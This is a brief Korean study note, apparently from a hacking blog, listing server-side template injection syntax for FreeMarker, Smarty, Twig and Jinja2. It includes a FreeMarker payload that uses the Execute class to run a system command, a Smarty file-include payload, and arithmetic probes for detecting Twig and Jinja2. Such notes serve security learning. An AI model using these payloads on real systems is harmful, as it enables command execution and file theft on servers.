lasthackers
아래 내용은 정리하고 있는 SSTI 종류별 문법으로 실제 테스트 해봐야한다.
- FreeMarker
- <#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“cat file”) }
해당 내용은 #assign ex를 통해 변수를 선언하고 Execute 인스턴스를 생성하여 시스템 명령어를 실행하는 것이다.
- <#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“cat file”) }
- Smarty
- {include file=’/file’}
- Twig
- {{7*’7′}} = 49
- Jinja2
- {{7*’7′}} = 7777777